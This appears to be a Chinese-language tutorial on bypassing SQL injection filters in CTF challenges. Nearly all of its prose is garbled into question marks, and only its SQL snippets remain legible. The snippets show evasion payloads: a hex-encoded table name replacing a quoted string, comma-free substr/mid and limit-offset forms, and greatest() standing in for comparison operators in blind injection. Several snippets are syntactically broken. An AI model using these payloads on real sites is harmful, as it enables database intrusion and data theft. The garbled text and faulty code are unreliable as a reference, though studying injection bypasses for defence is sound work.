????sql????????????????????????????????????????????????sql??????????????????????????????к?????????sql???????????С?????е???????????????????????sql???????
????SQL????????????к?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????CTF??????????????????????У?????????sql?????????????????????????????????????????????????????????????
??????????????
?????????????????????????where????С???????????sql?????????????????????????????users??????????ε???????
????select column_name from information_schema.tables where table_name="users"
?????????????????????????????????where????????????????????????????????????????????????????????
????users?????????????????7573657273????????sql????????
????select column_name from information_schema.tables where table_name=0x7573657273
????С??????????????????????
???????????????
???????????????????????substr() ??mid() ??limit????Щ???????????????????????substr()??mid()?????????????????from to???????????
????select substr(database(0 from 1 for 1);
????select mid(database(0 from 1 for 1);
????????limit???????offset???????
????select * from news limit 0??1
????# ?????????????SQL???
????select * from news limit 1 offset 0
????С?????from???????????
????????????(<??>)???
????????????????????????????????????????????????????????в????????????????????????????????greatest????????????
?????????????????sql???
????select * from users where id=1 and ascii(substr(database()??0??1))>64
??????????????????????????????????????????????????????greatest????????????????greatest(n1??n2??n3????)???????????????(n1??n2??n3????)??????
????????????????sql?????????greatest??????μ????:
????select * from users where id=1 and greatest(ascii(substr(database()??0??1))??64)=64
????С?????greatest()?????????????